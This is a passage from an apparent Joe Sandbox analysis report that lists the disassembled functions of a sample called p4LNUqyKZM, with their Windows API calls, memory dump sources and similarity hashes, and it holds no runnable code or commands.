                        • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00981CBC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: InfoParametersSystem
                        • String ID:
                        • API String ID: 3098949447-0
                        • Opcode ID: 6c860f5ee40e79493834638a1445b7256aaac9ed327fc65e18429d248888384e
                        • Instruction ID: 2dd8e3da9b11631336c53d6b5c80cbc0e0034563d04f3006a7d51f8f6756dcb1
                        • Opcode Fuzzy Hash: 6c860f5ee40e79493834638a1445b7256aaac9ed327fc65e18429d248888384e
                        • Instruction Fuzzy Hash: FCC092362C0304AFF215CBC0BC5EF607765B358B26F048401F609AD5F3D3A22822EB50
                        Function 009DD8DD Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                        Download Yara Rule
                        APIs
                        • GetTempPathW.KERNELBASE(00000104,?), ref: 009DD8E9
                          • Part of subcall function 009833A7: _wcslen.LIBCMT ref: 009833AB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: PathTemp_wcslen
                        • String ID:
                        • API String ID: 1974555822-0
                        • Opcode ID: 211ec1020842d9203ee5d2abfc5b7efe7120b7ef5ff991cf78c1c3742721ac5c
                        • Instruction ID: b831686f9ab8df88fc2698efbf4fec7d328c20ae4da134bd8d26ed97a67978d9
                        • Opcode Fuzzy Hash: 211ec1020842d9203ee5d2abfc5b7efe7120b7ef5ff991cf78c1c3742721ac5c
                        • Instruction Fuzzy Hash: BFC0487459201A9BDB90BBA0CCC9EE8B338EF00701F50C096E20A91190DE709A898B12
                        Function 009F744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00985745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0098949C,?,00008000), ref: 00985773
                        • GetLastError.KERNEL32(00000002,00000000), ref: 009F76DE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CreateErrorFileLast
                        • String ID:
                        • API String ID: 1214770103-0
                        • Opcode ID: 4b420941f8958471841c542ebdb919d5ec68b70840ddc9f36fb9b3cbd73cbdf3
                        • Instruction ID: 8fdb7582bcc50edde3210a3daed5413c05aed1a0e3062ed369bf527c1747dd57
                        • Opcode Fuzzy Hash: 4b420941f8958471841c542ebdb919d5ec68b70840ddc9f36fb9b3cbd73cbdf3
                        • Instruction Fuzzy Hash: 3B81AD302087059FCB14EF68C491B6AB7E5BF89314F04496DF9969B3A2DB30ED45CB92
                        Function 0099FC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                        • Instruction ID: 8fcbf75a5daa0bd54b63c003cdeebb9b199f72c7c78ffa9bdb09b202bd730f2f
                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                        • Instruction Fuzzy Hash: 3431D375A00109DBCB18CF5DD4A0969FBA9FF49300B28C6A5E849CB696E731EDC1CBD0
                        Function 0096229C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNELBASE(000001F4), ref: 009622B1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702116243.0000000000960000.00000040.00001000.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_960000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                        • Instruction ID: 49af86090f8c3aced6971d5606fda41fa40fa59368279b906dd098a558f66263
                        • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                        • Instruction Fuzzy Hash: 4FE0BF7494010EEFDB00EFA4D5496DE7BB4EF04711F1005A1FD05D7680DB309E548A62
                        Function 009622A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNELBASE(000001F4), ref: 009622B1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702116243.0000000000960000.00000040.00001000.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_960000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                        • Instruction ID: 60629779f3f8b857381546d31f5ec8c5cf71497cb24ddd7a2e4f0781e3518bb6
                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                        • Instruction Fuzzy Hash: CFE0E67494010EDFDB00EFB4D54969E7FB4EF04701F100161FD01D2280D6309D508A72

                        Non-executed Functions

                        Function 00A19576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00999BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00999BB2
                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00A1961A
                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A1965B
                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00A1969F
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A196C9
                        • SendMessageW.USER32 ref: 00A196F2
                        • GetKeyState.USER32(00000011), ref: 00A1978B
                        • GetKeyState.USER32(00000009), ref: 00A19798
                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A197AE
                        • GetKeyState.USER32(00000010), ref: 00A197B8
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A197E9
                        • SendMessageW.USER32 ref: 00A19810
                        • SendMessageW.USER32(?,00001030,?,00A17E95), ref: 00A19918
                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00A1992E
                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00A19941
                        • SetCapture.USER32(?), ref: 00A1994A
                        • ClientToScreen.USER32(?,?), ref: 00A199AF
                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00A199BC
                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A199D6
                        • ReleaseCapture.USER32 ref: 00A199E1
                        • GetCursorPos.USER32(?), ref: 00A19A19
                        • ScreenToClient.USER32(?,?), ref: 00A19A26
                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00A19A80
                        • SendMessageW.USER32 ref: 00A19AAE
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00A19AEB
                        • SendMessageW.USER32 ref: 00A19B1A
                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00A19B3B
                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00A19B4A
                        • GetCursorPos.USER32(?), ref: 00A19B68
                        • ScreenToClient.USER32(?,?), ref: 00A19B75
                        • GetParent.USER32(?), ref: 00A19B93
                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00A19BFA
                        • SendMessageW.USER32 ref: 00A19C2B
                        • ClientToScreen.USER32(?,?), ref: 00A19C84
                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00A19CB4
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00A19CDE
                        • SendMessageW.USER32 ref: 00A19D01
                        • ClientToScreen.USER32(?,?), ref: 00A19D4E
                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00A19D82
                          • Part of subcall function 00999944: GetWindowLongW.USER32(?,000000EB), ref: 00999952
                        • GetWindowLongW.USER32(?,000000F0), ref: 00A19E05
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                        • String ID: @GUI_DRAGID$F
                        • API String ID: 3429851547-4164748364
                        • Opcode ID: b1a4ae149677c09b42da1ed858c3a724e6083d2cd499af01af1ddaf7835b0a93
                        • Instruction ID: 635a56c16769344b6ed71c58d50fdace3a9ca0d80c3a3391d71d4e8062b3fb7c
                        • Opcode Fuzzy Hash: b1a4ae149677c09b42da1ed858c3a724e6083d2cd499af01af1ddaf7835b0a93
                        • Instruction Fuzzy Hash: 23427C74204241EFDB25CF68CC54BEBBBE5FF89320F144629F6A9872A1D731A891CB51
                        Function 00A14873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00A148F3
                        • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00A14908
                        • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00A14927
                        • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00A1494B
                        • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00A1495C
                        • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00A1497B
                        • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00A149AE
                        • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00A149D4
                        • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00A14A0F
                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00A14A56
                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00A14A7E
                        • IsMenu.USER32(?), ref: 00A14A97
                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A14AF2
                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A14B20
                        • GetWindowLongW.USER32(?,000000F0), ref: 00A14B94
                        • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00A14BE3
                        • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00A14C82
                        • wsprintfW.USER32 ref: 00A14CAE
                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A14CC9
                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 00A14CF1
                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00A14D13
                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A14D33
                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 00A14D5A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                        • String ID: %d/%02d/%02d
                        • API String ID: 4054740463-328681919
                        • Opcode ID: 3f3c70482a31d08a0c5b7a413835be8b0e0fab2094e0c2dbe839c22aa88b55cb
                        • Instruction ID: 73feb5f7f601119932d2bf4e8647bce16137ed04541997fecf446e79b78533dc
                        • Opcode Fuzzy Hash: 3f3c70482a31d08a0c5b7a413835be8b0e0fab2094e0c2dbe839c22aa88b55cb
                        • Instruction Fuzzy Hash: 2E12E071640214ABEB248F68CC49FEE7BF9EF89720F144129F515DB2E1DB789982CB50
                        Function 0099F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0099F998
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009DF474
                        • IsIconic.USER32(00000000), ref: 009DF47D
                        • ShowWindow.USER32(00000000,00000009), ref: 009DF48A
                        • SetForegroundWindow.USER32(00000000), ref: 009DF494
                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 009DF4AA
                        • GetCurrentThreadId.KERNEL32 ref: 009DF4B1
                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 009DF4BD
                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 009DF4CE
                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 009DF4D6
                        • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 009DF4DE
                        • SetForegroundWindow.USER32(00000000), ref: 009DF4E1
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 009DF4F6
                        • keybd_event.USER32(00000012,00000000), ref: 009DF501
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 009DF50B
                        • keybd_event.USER32(00000012,00000000), ref: 009DF510
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 009DF519
                        • keybd_event.USER32(00000012,00000000), ref: 009DF51E
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 009DF528
                        • keybd_event.USER32(00000012,00000000), ref: 009DF52D
                        • SetForegroundWindow.USER32(00000000), ref: 009DF530
                        • AttachThreadInput.USER32(?,000000FF,00000000), ref: 009DF557
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                        • String ID: Shell_TrayWnd
                        • API String ID: 4125248594-2988720461
                        • Opcode ID: 7d0bd5185f355bfa0cdd75d60793530c5b41636e7ccba351b9a45cca5eaeffa2
                        • Instruction ID: 87072a120f8019b340394eeb7ab2ad16c776586e2d5acfe1f11d60cf25f21b83
                        • Opcode Fuzzy Hash: 7d0bd5185f355bfa0cdd75d60793530c5b41636e7ccba351b9a45cca5eaeffa2
                        • Instruction Fuzzy Hash: 30314371AC0318BBEB21ABF55C4AFBF7E6DEB44B60F108466F601E61D1C6B15D01AA60
                        Function 009E1201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009E16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009E170D
                          • Part of subcall function 009E16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009E173A
                          • Part of subcall function 009E16C3: GetLastError.KERNEL32 ref: 009E174A
                        • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 009E1286
                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 009E12A8
                        • CloseHandle.KERNEL32(?), ref: 009E12B9
                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009E12D1
                        • GetProcessWindowStation.USER32 ref: 009E12EA
                        • SetProcessWindowStation.USER32(00000000), ref: 009E12F4
                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 009E1310
                          • Part of subcall function 009E10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009E11FC), ref: 009E10D4
                          • Part of subcall function 009E10BF: CloseHandle.KERNEL32(?,?,009E11FC), ref: 009E10E9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                        • String ID: $default$winsta0
                        • API String ID: 22674027-1027155976
                        • Opcode ID: 70d89aabb780fddb4e285e2494272fd7ab6b8cf480515bfce7957da922376ada
                        • Instruction ID: dc7e380d2164928b2077dbdd2cffd6d7a48ddbf0759e820b5d25be8f314edba2
                        • Opcode Fuzzy Hash: 70d89aabb780fddb4e285e2494272fd7ab6b8cf480515bfce7957da922376ada
                        • Instruction Fuzzy Hash: 69819A72900289ABDF22DFA5DC49FEE7BBDEF48710F148129F910A62A0D7718D45CB64
                        Function 009E0B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009E10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009E1114
                          • Part of subcall function 009E10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,009E0B9B,?,?,?), ref: 009E1120
                          • Part of subcall function 009E10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009E0B9B,?,?,?), ref: 009E112F
                          • Part of subcall function 009E10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009E0B9B,?,?,?), ref: 009E1136
                          • Part of subcall function 009E10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009E114D
                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009E0BCC
                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009E0C00
                        • GetLengthSid.ADVAPI32(?), ref: 009E0C17
                        • GetAce.ADVAPI32(?,00000000,?), ref: 009E0C51
                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009E0C6D
                        • GetLengthSid.ADVAPI32(?), ref: 009E0C84
                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 009E0C8C
                        • HeapAlloc.KERNEL32(00000000), ref: 009E0C93
                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 009E0CB4
                        • CopySid.ADVAPI32(00000000), ref: 009E0CBB
                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009E0CEA
                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009E0D0C
                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009E0D1E
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009E0D45
                        • HeapFree.KERNEL32(00000000), ref: 009E0D4C
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009E0D55
                        • HeapFree.KERNEL32(00000000), ref: 009E0D5C
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009E0D65
                        • HeapFree.KERNEL32(00000000), ref: 009E0D6C
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 009E0D78
                        • HeapFree.KERNEL32(00000000), ref: 009E0D7F
                          • Part of subcall function 009E1193: GetProcessHeap.KERNEL32(00000008,009E0BB1,?,00000000,?,009E0BB1,?), ref: 009E11A1
                          • Part of subcall function 009E1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,009E0BB1,?), ref: 009E11A8
                          • Part of subcall function 009E1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,009E0BB1,?), ref: 009E11B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                        • String ID:
                        • API String ID: 4175595110-0
                        • Opcode ID: 4d3d81b213c5290d66130b71e43e8c469ced4a6dc4c80e4873b0e8c7901791cf
                        • Instruction ID: 8171718909273c41859ab916f21f3dabd8600995fea9b2473e31c55c8b250ad8
                        • Opcode Fuzzy Hash: 4d3d81b213c5290d66130b71e43e8c469ced4a6dc4c80e4873b0e8c7901791cf
                        • Instruction Fuzzy Hash: 1671997290025AABDF11DFE5DC44BEEBBBCBF48310F148215E954A7191D7B4AE82CB60
                        Function 009FEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                        Download Yara Rule
                        APIs
                        • OpenClipboard.USER32(00A1CC08), ref: 009FEB29
                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 009FEB37
                        • GetClipboardData.USER32(0000000D), ref: 009FEB43
                        • CloseClipboard.USER32 ref: 009FEB4F
                        • GlobalLock.KERNEL32(00000000), ref: 009FEB87
                        • CloseClipboard.USER32 ref: 009FEB91
                        • GlobalUnlock.KERNEL32(00000000,00000000), ref: 009FEBBC
                        • IsClipboardFormatAvailable.USER32(00000001), ref: 009FEBC9
                        • GetClipboardData.USER32(00000001), ref: 009FEBD1
                        • GlobalLock.KERNEL32(00000000), ref: 009FEBE2
                        • GlobalUnlock.KERNEL32(00000000,?), ref: 009FEC22
                        • IsClipboardFormatAvailable.USER32(0000000F), ref: 009FEC38
                        • GetClipboardData.USER32(0000000F), ref: 009FEC44
                        • GlobalLock.KERNEL32(00000000), ref: 009FEC55
                        • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 009FEC77
                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 009FEC94
                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 009FECD2
                        • GlobalUnlock.KERNEL32(00000000,?,?), ref: 009FECF3
                        • CountClipboardFormats.USER32 ref: 009FED14
                        • CloseClipboard.USER32 ref: 009FED59
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                        • String ID:
                        • API String ID: 420908878-0
                        • Opcode ID: fad412407564933f58c26ef99709fdf29fdb71fbe68ed1c12ffb9f9e92c77db1
                        • Instruction ID: 1b1ca7b5c2df06c5254c94f4c96db57b9228eef9b8becc80ed5be88fd14a4a16
                        • Opcode Fuzzy Hash: fad412407564933f58c26ef99709fdf29fdb71fbe68ed1c12ffb9f9e92c77db1
                        • Instruction Fuzzy Hash: CB61CF34244305AFD300EF64D888FBA77A8AF84724F188559F596972B2DB31DD46CB62
                        Function 009F698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 009F69BE
                        • FindClose.KERNEL32(00000000), ref: 009F6A12
                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009F6A4E
                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009F6A75
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 009F6AB2
                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 009F6ADF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
